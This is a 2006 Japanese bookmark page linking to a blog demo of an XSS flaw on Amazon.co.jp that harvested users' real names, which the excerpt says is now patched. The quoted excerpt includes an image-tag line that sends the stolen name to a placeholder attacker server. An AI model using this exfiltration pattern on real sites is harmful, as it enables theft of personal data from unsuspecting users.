Amazon.co.jpのXSS脆弱性をついて本名を抜き取る実験。これは本当にヤバい!! 買い物終わったらすぐにサインアウトしないと危険。

wackywacky のブックマーク 2006/05/18 19:09

その他

このブックマークにはスターがありません。
最初のスターをつけてみよう!

本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!

    ↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?名"> かなんかでリクエスト...

    \ コメントが サクサク読める アプリです /

    • App Storeからダウンロード
    • Google Playで手に入れよう